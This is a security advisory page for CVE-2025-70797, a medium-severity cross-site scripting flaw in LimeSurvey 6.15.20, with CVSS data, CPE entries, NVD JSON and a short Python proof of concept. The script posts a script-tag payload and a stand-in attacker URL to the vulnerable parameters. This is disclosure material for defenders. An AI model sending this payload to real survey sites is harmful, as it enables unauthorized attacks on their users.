Security Vulnerability Report
中文
CVE-2025-70797 CVSS 6.1 MEDIUM

CVE-2025-70797

Published: 2026-04-09 18:16:43
Last Modified: 2026-04-16 19:01:02

Description

Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allows a remote attacker to execute arbitrary code via the Box[title] and box[url] parameters.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:limesurvey:limesurvey:6.15.20:251021:*:*:*:*:*:* - VULNERABLE
Limesurvey v.6.15.20+251021

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (replace with actual target) target_url = "http://target-limesurvey/index.php" # Malicious payload to test XSS payload = "<script>alert('CVE-2025-70797-XSS');</script>" # Vulnerable parameters based on the description params = { "Box[title]": payload, "box[url]": "http://attacker-controlled-site.com" } try: response = requests.post(target_url, data=params) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the application page for the alert box to verify vulnerability.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70797", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:16:42.547", "lastModified": "2026-04-16T19:01:01.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allows a remote attacker to execute arbitrary code via the Box[title] and box[url] parameters."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:limesurvey:limesurvey:6.15.20:251021:*:*:*:*:*:*", "matchCriteriaId": "B1F979B9-D9F1-4062-BD61-421EE4859C85"}]}]}], "references": [{"url": "https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/LimeSurvey/LimeSurvey/pull/4356", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}